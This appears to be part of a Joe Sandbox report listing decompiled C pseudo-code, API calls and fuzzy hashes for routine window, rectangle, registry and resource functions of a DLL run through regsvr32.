                                                                                                            • Opcode Fuzzy Hash: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                                                            • Instruction Fuzzy Hash: 6321B375500621AED716DFA1CC84CBBB7ECEF48642B00C429F946DB251EB30ED41DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 81%
                                                                                                            			E1000BEEF(void* __edi) {
                                                                                                            				intOrPtr _t35;
                                                                                                            				intOrPtr _t46;
                                                                                                            				intOrPtr _t48;
                                                                                                            				intOrPtr _t50;
                                                                                                            				signed int _t60;
                                                                                                            				void* _t63;
                                                                                                            
                                                                                                            				E10011BF0(0x1003aec3, _t63);
                                                                                                            				_t60 = 0;
                                                                                                            				 *((intOrPtr*)(_t63 - 0x10)) = 0;
                                                                                                            				 *((intOrPtr*)(_t63 - 0x14)) = 0x10040668;
                                                                                                            				_t48 =  *((intOrPtr*)(_t63 + 8));
                                                                                                            				 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = 0;
                                                                                                            				 *(_t63 - 4) = 0;
                                                                                                            				if( *((intOrPtr*)(_t48 - 8)) == 0) {
                                                                                                            					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t48 - 0xac)) + 0x1c)) + 0x1c)));
                                                                                                            					_t35 = E10029068();
                                                                                                            					 *((intOrPtr*)(_t48 - 8)) = _t35;
                                                                                                            					if(_t35 == 0) {
                                                                                                            						goto L1;
                                                                                                            					} else {
                                                                                                            						if( *(_t63 + 0xc) != 0) {
                                                                                                            							IntersectRect(_t63 - 0x24, _t48 - 0x9c,  *(_t63 + 0xc));
                                                                                                            						} else {
                                                                                                            							asm("movsd");
                                                                                                            							asm("movsd");
                                                                                                            							asm("movsd");
                                                                                                            							asm("movsd");
                                                                                                            							_t60 = 0;
                                                                                                            						}
                                                                                                            						E1002935D(_t63 - 0x14, CreateRectRgnIndirect(_t63 - 0x24));
                                                                                                            						E10028ED2( *((intOrPtr*)(_t48 - 8)), _t63 - 0x14, 1);
                                                                                                            						_t50 =  *((intOrPtr*)(_t48 - 8));
                                                                                                            						if(_t50 != _t60) {
                                                                                                            							_t46 =  *((intOrPtr*)(_t50 + 4));
                                                                                                            						} else {
                                                                                                            							_t46 = 0;
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = _t46;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L1:
                                                                                                            					_t60 = 0x80004005;
                                                                                                            				}
                                                                                                            				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
                                                                                                            				 *((intOrPtr*)(_t63 - 0x14)) = 0x1003eb6c;
                                                                                                            				E100293B4(_t63 - 0x14);
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
                                                                                                            				return _t60;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateH_prologIndirectRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2123978231-0
                                                                                                            • Opcode ID: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
                                                                                                            • Instruction ID: 0eb4197897c7316f9a7e31aff11a4a7e3f3024ffe359f966774616c60da486ac
                                                                                                            • Opcode Fuzzy Hash: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
                                                                                                            • Instruction Fuzzy Hash: E121397690062ADFDB01CFA4C8849AEB7B8FF08790F514166F906AB255C771AE05CFB1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1002C73E(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a12) {
                                                                                                            				intOrPtr _v12;
                                                                                                            				char _v16;
                                                                                                            				struct tagRECT _v32;
                                                                                                            				struct HDC__* _v44;
                                                                                                            				char _v52;
                                                                                                            				struct tagTEXTMETRICA _v108;
                                                                                                            				void* __ebp;
                                                                                                            				long _t25;
                                                                                                            				int _t35;
                                                                                                            				intOrPtr* _t40;
                                                                                                            				void* _t43;
                                                                                                            				intOrPtr _t53;
                                                                                                            				intOrPtr* _t59;
                                                                                                            				intOrPtr _t60;
                                                                                                            
                                                                                                            				_t59 = __ecx;
                                                                                                            				_push(0);
                                                                                                            				E100290F7( &_v52);
                                                                                                            				_t25 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
                                                                                                            				_t43 = 0;
                                                                                                            				if(_t25 != 0) {
                                                                                                            					_t43 = E1000866D( &_v52, _t25);
                                                                                                            				}
                                                                                                            				GetTextMetricsA(_v44,  &_v108);
                                                                                                            				_t62 = _t43;
                                                                                                            				if(_t43 != 0) {
                                                                                                            					E1000866D( &_v52, _t43);
                                                                                                            				}
                                                                                                            				E10029152( &_v52, _t62);
                                                                                                            				SetRectEmpty( &_v32);
                                                                                                            				 *((intOrPtr*)( *_t59 + 0x13c))( &_v32, _a12);
                                                                                                            				 *((intOrPtr*)( *_t59 + 0x110))(0x407, 0,  &_v16);
                                                                                                            				_t35 = GetSystemMetrics(6);
                                                                                                            				_t60 =  *((intOrPtr*)(_t59 + 0x90));
                                                                                                            				_t53 = (_t35 + _v12 << 1) - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
                                                                                                            				if(_t53 < _t60) {
                                                                                                            					_t53 = _t60;
                                                                                                            				}
                                                                                                            				_t40 = _a4;
                                                                                                            				 *_t40 = 0x7fff;
                                                                                                            				 *((intOrPtr*)(_t40 + 4)) = _t53;
                                                                                                            				return _t40;
                                                                                                            			}


















                                                                                                            APIs
                                                                                                              • Part of subcall function 100290F7: __EH_prolog.LIBCMT ref: 100290FC
                                                                                                              • Part of subcall function 100290F7: GetDC.USER32(00000000), ref: 1002912A
                                                                                                            • SendMessageA.USER32 ref: 1002C75B
                                                                                                            • GetTextMetricsA.GDI32(?,?), ref: 1002C779
                                                                                                            • SetRectEmpty.USER32(?), ref: 1002C798
                                                                                                            • GetSystemMetrics.USER32 ref: 1002C7D0
                                                                                                              • Part of subcall function 1000866D: SelectObject.GDI32(?,?), ref: 1000867C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Metrics$EmptyH_prologMessageObjectRectSelectSendSystemText
                                                                                                            • String ID:
                                                                                                            • API String ID: 1847300772-0
                                                                                                            • Opcode ID: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                                                            • Instruction ID: 7e47f88f2f58757794e6d6d0f1f8ec1525fff8c624cfc69816e05b16ce6d54a2
                                                                                                            • Opcode Fuzzy Hash: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                                                            • Instruction Fuzzy Hash: 67217936A00218AFDB15DFA8DC89CEEBBB9FF88700F414529F512A7291DB717945CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10034B35(intOrPtr __ecx) {
                                                                                                            				void* _v8;
                                                                                                            				char _v12;
                                                                                                            				int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				int _v24;
                                                                                                            				char* _t32;
                                                                                                            				intOrPtr _t34;
                                                                                                            				char** _t35;
                                                                                                            				signed int _t40;
                                                                                                            				char** _t44;
                                                                                                            				char* _t46;
                                                                                                            
                                                                                                            				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
                                                                                                            				_t46 =  *0x1004b390; // 0x1003d660
                                                                                                            				_v20 = __ecx;
                                                                                                            				_v8 = 0;
                                                                                                            				_v12 = 0;
                                                                                                            				_v24 = 4;
                                                                                                            				_v16 = 0;
                                                                                                            				_t35 = 0x1004b390;
                                                                                                            				if(_t46 == 0) {
                                                                                                            					L13:
                                                                                                            					RegCloseKey(0);
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            				do {
                                                                                                            					if(RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8) != 0) {
                                                                                                            						goto L11;
                                                                                                            					}
                                                                                                            					_t8 =  &(_t35[1]); // 0x1004b358
                                                                                                            					_t44 =  *_t8;
                                                                                                            					while(1) {
                                                                                                            						_t32 =  *_t44;
                                                                                                            						if(_t32 == 0) {
                                                                                                            							goto L11;
                                                                                                            						}
                                                                                                            						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
                                                                                                            							_t34 = _v20;
                                                                                                            							_t16 =  &(_t44[1]); // 0x1
                                                                                                            							_t40 =  *_t16;
                                                                                                            							if(_v12 == 0) {
                                                                                                            								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
                                                                                                            							} else {
                                                                                                            								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_v12 = 0;
                                                                                                            						_v24 = 4;
                                                                                                            						_v16 = 0;
                                                                                                            						_t44 =  &(_t44[2]);
                                                                                                            					}
                                                                                                            					L11:
                                                                                                            					RegCloseKey(_v8);
                                                                                                            					_t35 =  &(_t35[2]);
                                                                                                            					_v8 = 0;
                                                                                                            				} while ( *_t35 != 0);
                                                                                                            				goto L13;
                                                                                                            			}















                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,1004B390,00000000,00000001,?), ref: 10034B78
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 10034B98
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10034BDC
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 10034BF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$OpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 1607946009-0
                                                                                                            • Opcode ID: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                                                            • Instruction ID: c59a5bb59059241ef396f1e8f67c70b524d6e5c214a839477bb571e1d0f0587e
                                                                                                            • Opcode Fuzzy Hash: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                                                            • Instruction Fuzzy Hash: 86212CB5D00259EFDB06CF96C985EAEFBF8EF80355F1240AAE405AA151D770AA00CF21
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 37%
                                                                                                            			E1000D0B9(signed int _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                            				void* _t14;
                                                                                                            				signed int _t16;
                                                                                                            				signed int _t17;
                                                                                                            				signed int _t18;
                                                                                                            				signed int _t20;
                                                                                                            				signed int _t23;
                                                                                                            				signed int* _t31;
                                                                                                            
                                                                                                            				_t31 = _a8;
                                                                                                            				if(_t31 == 0) {
                                                                                                            					return _t14;
                                                                                                            				}
                                                                                                            				_t23 = _a4;
                                                                                                            				if((_t23 & 0x00000020) == 0) {
                                                                                                            					_t16 = (_t23 & 0x0000ffff) - 8;
                                                                                                            					__eflags = _t16;
                                                                                                            					if(_t16 == 0) {
                                                                                                            						__imp__#6( *_t31);
                                                                                                            						L16:
                                                                                                            						 *_t31 =  *_t31 & 0x00000000;
                                                                                                            						L17:
                                                                                                            						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
                                                                                                            							__imp__CoTaskMemFree(_t31[1]);
                                                                                                            						}
                                                                                                            						return _t16;
                                                                                                            					}
                                                                                                            					_t17 = _t16 - 1;
                                                                                                            					__eflags = _t17;
                                                                                                            					if(_t17 == 0) {
                                                                                                            						L13:
                                                                                                            						_t16 =  *_t31;
                                                                                                            						__eflags = _t16;
                                                                                                            						if(_t16 == 0) {
                                                                                                            							goto L17;
                                                                                                            						}
                                                                                                            						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
                                                                                                            						goto L16;
                                                                                                            					}
                                                                                                            					_t16 = _t17 - 3;
                                                                                                            					__eflags = _t16;
                                                                                                            					if(_t16 == 0) {
                                                                                                            						__imp__#9(_t31);
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            					_t18 = _t16 - 1;
                                                                                                            					__eflags = _t18;
                                                                                                            					if(_t18 == 0) {
                                                                                                            						goto L13;
                                                                                                            					}
                                                                                                            					_t16 = _t18 - 0x7b;
                                                                                                            					__eflags = _t16;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						E1000D03C( &_a8, __eflags, _a12);
                                                                                                            						_t20 = _a8;
                                                                                                            						__eflags = _t20;
                                                                                                            						if(_t20 != 0) {
                                                                                                            							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
                                                                                                            						}
                                                                                                            						_t16 = L1000C8E6( &_a8);
                                                                                                            					}
                                                                                                            					goto L17;
                                                                                                            				}
                                                                                                            				_t16 =  *_t31;
                                                                                                            				if(_t16 == 0) {
                                                                                                            					goto L17;
                                                                                                            				}
                                                                                                            				__imp__#16(_t16);
                                                                                                            				goto L16;
                                                                                                            			}











                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArrayDestroyFreeSafeTask
                                                                                                            • String ID:
                                                                                                            • API String ID: 3253174383-0
                                                                                                            • Opcode ID: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                                                            • Instruction ID: d5df2e689e9d8d1315e3bdacc16dfbb058a5afc5faf3f73fb235713c606ee203
                                                                                                            • Opcode Fuzzy Hash: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                                                            • Instruction Fuzzy Hash: E711563010020ABBFB55EF66DC84BEE77A8EF457D0F10441AFA858A198CF35EA00CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 64%
                                                                                                            			E1000C037(void* __edi) {
                                                                                                            				int _t36;
                                                                                                            				void* _t52;
                                                                                                            				intOrPtr* _t55;
                                                                                                            				void* _t56;
                                                                                                            				void* _t58;
                                                                                                            
                                                                                                            				E10011BF0(0x1003aec3, _t58);
                                                                                                            				 *((intOrPtr*)(_t58 - 0x10)) = 0;
                                                                                                            				 *((intOrPtr*)(_t58 - 0x14)) = 0x10040668;
                                                                                                            				_t55 =  *((intOrPtr*)(_t58 + 8));
                                                                                                            				 *(_t58 - 4) = 0;
                                                                                                            				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                            					_push( *((intOrPtr*)(_t58 + 0xc)));
                                                                                                            					_t52 = E1002934F();
                                                                                                            					GetRgnBox( *(_t52 + 4), _t58 - 0x24);
                                                                                                            					IntersectRect(_t58 - 0x34, _t58 - 0x24, _t55 - 0x9c);
                                                                                                            					_t36 = EqualRect(_t58 - 0x34, _t58 - 0x24);
                                                                                                            					_push( *((intOrPtr*)(_t58 + 0x10)));
                                                                                                            					if(_t36 != 0) {
                                                                                                            						_push(_t52);
                                                                                                            						E1000B505( *((intOrPtr*)( *((intOrPtr*)(_t55 - 0xac)) + 0x1c)));
                                                                                                            						_t56 = 0;
                                                                                                            					} else {
                                                                                                            						_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0);
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0,  *((intOrPtr*)(_t58 + 0x10)));
                                                                                                            				}
                                                                                                            				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
                                                                                                            				 *((intOrPtr*)(_t58 - 0x14)) = 0x1003eb6c;
                                                                                                            				E100293B4(_t58 - 0x14);
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
                                                                                                            				return _t56;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$EqualH_prologIntersect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2227276553-0
                                                                                                            • Opcode ID: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
                                                                                                            • Instruction ID: 4a10622ef6c9ad6aa885a1ca4e3b79ad8472db7afe28fedb0a7e7fe58967940e
                                                                                                            • Opcode Fuzzy Hash: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
                                                                                                            • Instruction Fuzzy Hash: 19210B7290025DEFDB11DFA4C984D9EBBB8FF08291B11466AF906E7250D731AE11CF61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E100306DB(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				int _v8;
                                                                                                            				int _t21;
                                                                                                            				intOrPtr _t35;
                                                                                                            				int _t39;
                                                                                                            				void* _t49;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t49 = __ecx;
                                                                                                            				_t39 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                                                            				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                                                            				_v8 = _t21;
                                                                                                            				OffsetRect(__ecx + 0x28, _t39, _t21);
                                                                                                            				OffsetRect(_t49 + 0x48, _t39, _v8);
                                                                                                            				OffsetRect(_t49 + 0x38, _t39, _v8);
                                                                                                            				OffsetRect(_t49 + 0x58, _t39, _v8);
                                                                                                            				_t51 =  *((intOrPtr*)(_t49 + 0x80));
                                                                                                            				 *((intOrPtr*)(_t49 + 4)) = _a4;
                                                                                                            				 *((intOrPtr*)(_t49 + 8)) = _a8;
                                                                                                            				if( *((intOrPtr*)(_t49 + 0x80)) == 0) {
                                                                                                            					_t35 = E100301DC();
                                                                                                            				} else {
                                                                                                            					_t35 = 0;
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(_t49 + 0x74)) = _t35;
                                                                                                            				return E10030582(_t49, _t51, 0);
                                                                                                            			}









                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: OffsetRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 177026234-0
                                                                                                            • Opcode ID: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                                                            • Instruction ID: 422a5061f760cbc8c05fd093b4a9fb31e1b7e654ec4c61e66631bb08b1bca8e5
                                                                                                            • Opcode Fuzzy Hash: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                                                            • Instruction Fuzzy Hash: 3D110CB6600608BFD711DFEDC994DABB7ECEF48210F00882AF54AD7610E670FA408B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1001EFFC(void* __ecx) {
                                                                                                            				void* _v8;
                                                                                                            				signed short _t23;
                                                                                                            				void* _t30;
                                                                                                            				struct HINSTANCE__* _t32;
                                                                                                            				signed short _t34;
                                                                                                            				void* _t36;
                                                                                                            				signed short* _t39;
                                                                                                            				signed short _t41;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t36 = __ecx;
                                                                                                            				_t39 =  *(__ecx + 0x5c);
                                                                                                            				_v8 =  *((intOrPtr*)(__ecx + 0x58));
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
                                                                                                            					_t32 =  *(E100373B5() + 0xc);
                                                                                                            					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
                                                                                                            				}
                                                                                                            				if(_v8 != 0) {
                                                                                                            					_t39 = LockResource(_v8);
                                                                                                            				}
                                                                                                            				_t30 = 1;
                                                                                                            				if(_t39 != 0) {
                                                                                                            					_t34 =  *_t39;
                                                                                                            					if(_t39[1] != 0xffff) {
                                                                                                            						_t23 = _t39[5];
                                                                                                            						_t41 = _t39[6];
                                                                                                            					} else {
                                                                                                            						_t34 = _t39[6];
                                                                                                            						_t23 = _t39[9];
                                                                                                            						_t41 = _t39[0xa];
                                                                                                            					}
                                                                                                            					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
                                                                                                            						_t30 = 0;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if( *(_t36 + 0x54) != 0) {
                                                                                                            					FreeResource(_v8);
                                                                                                            				}
                                                                                                            				return _t30;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F022
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1001F02A
                                                                                                            • LockResource.KERNEL32(00000000), ref: 1001F03C
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1001F086
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                                                            • Instruction ID: f62bb37731aceb1cfac18bd5f8f11ebe971a113ae325be4be6212f910cba7098
                                                                                                            • Opcode Fuzzy Hash: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                                                            • Instruction Fuzzy Hash: 8711E73A500715EFD722EFA1C988AABB7B4FF18794F00815CE8429B652D770EC84CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1001D8A6(void* __ecx, struct tagPOINT* _a8) {
                                                                                                            				struct tagPOINT _v12;
                                                                                                            				struct tagPOINT* _t8;
                                                                                                            				struct HWND__* _t9;
                                                                                                            				int _t14;
                                                                                                            				long _t18;
                                                                                                            				struct HWND__* _t20;
                                                                                                            				struct HWND__* _t21;
                                                                                                            				struct HWND__* _t24;
                                                                                                            
                                                                                                            				_t8 = _a8;
                                                                                                            				_v12.x = _t8->x;
                                                                                                            				_t18 = _t8->y;
                                                                                                            				_push(_t18);
                                                                                                            				_v12.y = _t18;
                                                                                                            				_t9 = WindowFromPoint( *_t8);
                                                                                                            				_t24 = _t9;
                                                                                                            				if(_t24 != 0) {
                                                                                                            					_t20 = GetParent(_t24);
                                                                                                            					if(_t20 == 0 || E10029A8E(_t20, 2) == 0) {
                                                                                                            						ScreenToClient(_t24,  &_v12);
                                                                                                            						_t21 = E10029C98(_t24, _v12.x, _v12.y);
                                                                                                            						if(_t21 == 0) {
                                                                                                            							L6:
                                                                                                            							_t9 = _t24;
                                                                                                            						} else {
                                                                                                            							_t14 = IsWindowEnabled(_t21);
                                                                                                            							_t9 = _t21;
                                                                                                            							if(_t14 != 0) {
                                                                                                            								goto L6;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t9 = _t20;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t9;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • WindowFromPoint.USER32(?,?), ref: 1001D8BD
                                                                                                            • GetParent.USER32(00000000), ref: 1001D8CB
                                                                                                            • ScreenToClient.USER32 ref: 1001D8EC
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 1001D905
                                                                                                              • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientEnabledFromLongParentPointScreen
